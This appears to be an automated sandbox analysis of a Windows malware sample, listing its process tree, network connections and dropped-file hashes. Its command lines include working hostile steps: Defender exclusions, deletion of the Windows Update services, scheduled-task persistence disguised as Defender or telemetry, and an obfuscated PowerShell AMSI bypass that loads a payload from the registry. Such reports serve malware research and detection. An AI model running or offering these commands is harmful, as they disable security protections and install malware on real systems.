C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1312 -ip 1312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1312 -s 140
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MTByPtOBIsyf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WLrWkWTRVUjJCG,[Parameter(Position=1)][Type]$PIQWdiUtBy)$rTMvMQRQFax=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+'eT'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+',A'+[Char](117)+'t'+'o'+'C'+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$rTMvMQRQFax.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'li'+'c'+'',[Reflection.CallingConventions]::Standard,$WLrWkWTRVUjJCG).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$rTMvMQRQFax.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'ub'+'l'+''+'i'+''+'c'+','+'H'+''+'i'+'d'+'e
'+''+'B'+'yS'+[Char](105)+'g'+[Char](44)+'N'+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+',Vi'+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$PIQWdiUtBy,$WLrWkWTRVUjJCG).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $rTMvMQRQFax.CreateType();}$gqftNOfLNdsTg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+'d'+'l'+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+'f'+'t'+'.W'+[Char](105)+''+[Char](110)+''+[Char](51)+'2.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'g'+[Char](113)+'f'+[Char](116)+''+[Char](78)+''+[Char](79)+''+'f'+''+[Char](76)+''+[Char](78)+''+[Char](100)+''+[Char](115)+''+[Char](84)+''+[Char](103)+'');$DpzZTwbAOZrBoH=$gqftNOfLNdsTg.GetMethod('D'+[Char](112)+''+'z'+''+[Char](90)+''+'T'+''+[Char](119)+'b'+[Char](65)+'O'+[Char](90)+''+[Char](114)+''+[Char](66)+''+'o'+''+'H'+'',[Reflection.BindingFlags]'P'+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KPvGsKRjoqTSJzbytxj=MTByPtOBIsyf @([String])([IntPtr]);$QaeFlqOBJKtOVYeNqgpIwb=MTByPtOBIsyf 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZrSwHqamEXq=$gqftNOfLNdsTg.GetMethod(''+'G'+'e'+[Char](116)+'M'+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+'Ha'+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'ne'+[Char](108)+'32'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$TAzoCUEZlZflZv=$DpzZTwbAOZrBoH.Invoke($Null,@([Object]$ZrSwHqamEXq,[Object](''+'L'+'o'+[Char](97)+''+'d'+''+'L'+''+'i'+''+[Char](98)+''+'r'+'ar'+[Char](121)+''+[Char](65)+'')));$lmxCVeANJmtkUoAaM=$DpzZTwbAOZrBoH.Invoke($Null,@([Object]$ZrSwHqamEXq,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$RFxZGwl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TAzoCUEZlZflZv,$KPvGsKRjoqTSJzbytxj).Invoke('a'+'m'+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$XrXXvOMLTweGFEvRb=$DpzZTwbAOZrBoH.Invoke($Null,@([Object]$RFxZGwl,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+'fer')));$pdZJifAPSg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lmxCVeANJmtkUoAaM,$QaeFlqOBJKtOVYeNqgpIwb).Invoke($XrXXvOMLTweGFEvRb,[uint32]8,4,[ref]$pdZJifAPSg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XrXXvOMLTweGFEvRb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lmxCVeANJmtkUoAaM,$QaeFlqOBJKtOVYeNqgpIwb).Invoke($XrXXvOMLTweGFEvRb,[uint32]8,0x20,[ref]$pdZJifAPSg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+'s'+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b96c8909-50d6-4cea-b72b-ea14bdbe135b}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 544 -p 4248 -ip 4248
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 3232 -ip 3232
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3232 -s 988
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4248 -s 392
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 580 -p 3176 -ip 3176
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 260 -ip 260
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3176 -s 228
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 4008 -ip 4008
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4008 -s 484
Network
| Country | Destination | Domain | Proto |
| N/A | 13.69.239.74:443 | | tcp |
| N/A | 8.247.211.254:80 | | tcp |
| N/A | 8.247.211.254:80 | | tcp |
| N/A | 209.197.3.8:80 | | tcp |
| N/A | 93.184.220.29:80 | | tcp |
| N/A | 93.184.220.29:80 | | tcp |
| N/A | 8.247.211.254:80 | | tcp |
| N/A | 8.247.211.254:80 | | tcp |
| N/A | 8.8.8.8:53 | connect2me.hopto.org | udp |
| N/A | 37.139.129.113:443 | connect2me.hopto.org | tcp |
| N/A | 107.182.129.73:21733 | | tcp |
Files
memory/1796-132-0x0000000000000000-mapping.dmp
memory/1796-133-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1796-139-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1324-140-0x0000000000000000-mapping.dmp
memory/1324-141-0x0000000002BC0000-0x0000000002BF6000-memory.dmp
memory/1324-142-0x0000000005460000-0x0000000005A88000-memory.dmp
memory/1324-143-0x0000000005210000-0x0000000005232000-memory.dmp
memory/1324-144-0x0000000005B40000-0x0000000005BA6000-memory.dmp
memory/1324-145-0x0000000005BB0000-0x0000000005C16000-memory.dmp
memory/1324-146-0x00000000061A0000-0x00000000061BE000-memory.dmp
memory/1324-147-0x0000000006760000-0x0000000006792000-memory.dmp
memory/1324-148-0x0000000070F60000-0x0000000070FAC000-memory.dmp
memory/1324-149-0x0000000006740000-0x000000000675E000-memory.dmp
memory/1324-150-0x0000000007BE0000-0x000000000825A000-memory.dmp
memory/1324-151-0x00000000067E0000-0x00000000067FA000-memory.dmp
memory/1324-152-0x00000000075C0000-0x00000000075CA000-memory.dmp
memory/1324-153-0x00000000077C0000-0x0000000007856000-memory.dmp
memory/1324-154-0x0000000007580000-0x000000000758E000-memory.dmp
memory/1324-155-0x0000000007880000-0x000000000789A000-memory.dmp
memory/1324-156-0x0000000007860000-0x0000000007868000-memory.dmp
memory/1324-157-0x00000000078E0000-0x0000000007902000-memory.dmp
memory/1324-158-0x0000000008810000-0x0000000008DB4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/1344-159-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/1312-162-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 990c8e3fc56a2734631b51fc61a6779a |
| SHA1 | 55a16cc67fc52cdf0690387e083955048106d48a |
| SHA256 | d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e |
| SHA512 | f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5 |
memory/1344-164-0x0000000000F20000-0x000000000108C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 990c8e3fc56a2734631b51fc61a6779a |
| SHA1 | 55a16cc67fc52cdf0690387e083955048106d48a |
| SHA256 | d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e |
| SHA512 | f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5 |
memory/4280-167-0x00000000007D0000-0x00000000007F0000-memory.dmp
memory/4280-166-0x0000000000000000-mapping.dmp
memory/1344-172-0x00000000058E0000-0x0000000005972000-memory.dmp
memory/2188-173-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/2208-176-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1344-178-0x00000000060B0000-0x00000000060BA000-memory.dmp
memory/2188-179-0x00000000021C1000-0x00000000026C5000-memory.dmp
memory/4280-180-0x00000000053C0000-0x00000000059D8000-memory.dmp
memory/4280-181-0x0000000004E60000-0x0000000004E72000-memory.dmp
memory/4280-182-0x0000000004F90000-0x000000000509A000-memory.dmp
memory/4280-183-0x0000000004ED0000-0x0000000004F0C000-memory.dmp
memory/2188-184-0x00000000026D7000-0x0000000002814000-memory.dmp
memory/2188-185-0x00000000021C1000-0x00000000026C5000-memory.dmp
memory/4280-186-0x0000000005330000-0x00000000053A6000-memory.dmp
memory/4280-187-0x0000000005B20000-0x0000000005B3E000-memory.dmp
memory/2276-188-0x000001F8EF650000-0x000001F8EF672000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 15db1985e91cf3754604b9337a72ca47 |
| SHA1 | 3451b17f81d8f80b33bd0184dc4e19b5be6b1196 |
| SHA256 | 48b46a9ecb43238a8cb32345e55c9d6ae0bedca1d7fc3e0c333211ecc2521ced |
| SHA512 | 39e05c6375eff2d5d1b9d2c0e503e7c53b66be0c62e03312f9979381c1a1b26cedef56fd66c44aed013b6dd2cb36c238bf82ab0ed00eb0a5de4abcede577fe8f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 124edf3ad57549a6e475f3bc4e6cfe51 |
| SHA1 | 80f5187eeebb4a304e9caa0ce66fcd78c113d634 |
| SHA256 | 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675 |
| SHA512 | b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee |
memory/2276-191-0x000001F8EF860000-0x000001F8EF87C000-memory.dmp
memory/2276-192-0x00007FFE2EB80000-0x00007FFE2F641000-memory.dmp
memory/2276-193-0x000001F8EF880000-0x000001F8EF88A000-memory.dmp
memory/2276-194-0x000001F8EF8B0000-0x000001F8EF8CC000-memory.dmp
memory/2188-195-0x00000000026D7000-0x0000000002814000-memory.dmp
memory/4280-196-0x0000000006B10000-0x0000000006CD2000-memory.dmp
memory/2276-197-0x000001F8EF890000-0x000001F8EF89A000-memory.dmp
memory/4280-198-0x0000000007210000-0x000000000773C000-memory.dmp
memory/2276-199-0x000001F8EF8F0000-0x000001F8EF90A000-memory.dmp
memory/2276-200-0x000001F8EF8A0000-0x000001F8EF8A8000-memory.dmp
memory/2276-201-0x000001F8EF8D0000-0x000001F8EF8D6000-memory.dmp
memory/2276-202-0x000001F8EF8E0000-0x000001F8EF8EA000-memory.dmp
memory/2276-203-0x00007FFE2EB80000-0x00007FFE2F641000-memory.dmp
memory/984-204-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
memory/3312-206-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c697637a9b17f577fccd7e83a5495810 |
| SHA1 | 04e6054584786b88994b0e0a871562227fe2a435 |
| SHA256 | 54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164 |
| SHA512 | 66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0 |
memory/2228-208-0x0000000000000000-mapping.dmp
memory/2952-209-0x0000000000000000-mapping.dmp
memory/1832-210-0x0000000000000000-mapping.dmp
memory/1020-211-0x0000000000000000-mapping.dmp
memory/1592-212-0x0000000000000000-mapping.dmp
memory/1444-213-0x0000000000000000-mapping.dmp
memory/3508-214-0x0000000000000000-mapping.dmp
memory/4808-215-0x00007FFE2EB80000-0x00007FFE2F641000-memory.dmp
memory/4748-216-0x0000000000000000-mapping.dmp
memory/4808-217-0x000001E7F2029000-0x000001E7F202F000-memory.dmp
memory/4808-219-0x000001E7F2029000-0x000001E7F202F000-memory.dmp
memory/4808-218-0x00007FFE2EB80000-0x00007FFE2F641000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/4804-221-0x00007FF6D6AF1938-mapping.dmp
memory/364-222-0x00007FFE2FC60000-0x00007FFE30721000-memory.dmp
memory/4280-223-0x0000000006AA0000-0x0000000006AF0000-memory.dmp
memory/2188-224-0x00000000109F0000-0x0000000010A47000-memory.dmp
memory/2188-225-0x00000000109F0000-0x0000000010A47000-memory.dmp
memory/364-226-0x00007FFE4DC70000-0x00007FFE4DE65000-memory.dmp
memory/2188-227-0x00000000109E0000-0x00000000109E6000-memory.dmp
memory/3568-229-0x0000000000000000-mapping.dmp
memory/364-230-0x00007FFE4DC70000-0x00007FFE4DE65000-memory.dmp
memory/364-231-0x00007FFE4C820000-0x00007FFE4C8DE000-memory.dmp
memory/3316-233-0x0000000140000000-0x0000000140029000-memory.dmp
memory/3316-234-0x0000000140002314-mapping.dmp
memory/3316-236-0x0000000140000000-0x0000000140029000-memory.dmp
memory/3316-237-0x00007FFE4DC70000-0x00007FFE4DE65000-memory.dmp
memory/3316-238-0x00007FFE4C820000-0x00007FFE4C8DE000-memory.dmp
memory/60-239-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/596-240-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/680-244-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2496-274-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2108-269-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1824-263-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1436-255-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1200-250-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1036-247-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/700-246-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/440-243-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/952-242-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/3316-241-0x0000000140000000-0x0000000140029000-memory.dmp
memory/776-282-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/3044-281-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2776-280-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2768-279-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/596-297-0x000001CFB3580000-0x000001CFB35A1000-memory.dmp
memory/60-302-0x0000027870C00000-0x0000027870C27000-memory.dmp
memory/1036-305-0x000001F0FA740000-0x000001F0FA767000-memory.dmp
memory/4376-306-0x0000022CA82A0000-0x0000022CA82C7000-memory.dmp
memory/2188-310-0x00000000026D7000-0x0000000002814000-memory.dmp
memory/3932-312-0x0000000000000000-mapping.dmp
memory/4992-309-0x0000000000000000-mapping.dmp
memory/700-304-0x000002512EEC0000-0x000002512EEE7000-memory.dmp
memory/440-303-0x000001D729860000-0x000001D729887000-memory.dmp
memory/680-301-0x0000020794990000-0x00000207949B7000-memory.dmp
memory/596-299-0x000001CFB35B0000-0x000001CFB35D7000-memory.dmp
memory/2760-278-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2708-277-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2668-276-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2656-275-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2472-273-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2360-272-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2348-271-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2144-270-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2996-330-0x0000000000000000-mapping.dmp
memory/1996-268-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1264-334-0x0000000000000000-mapping.dmp
memory/2036-267-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1980-266-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1948-265-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1940-264-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1784-262-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1676-261-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1660-260-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1644-259-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1604-258-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1528-257-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1452-256-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1404-254-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1356-253-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1244-252-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1232-251-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1124-249-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1056-248-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/3316-245-0x00007FFE4DC70000-0x00007FFE4DE65000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6E7.tmp.csv
| MD5 | 6e5f277667f7d0cab2c5f4cfa5fca45c |
| SHA1 | 85ac85bdcccef50d0c7c95115234de352c8290ee |
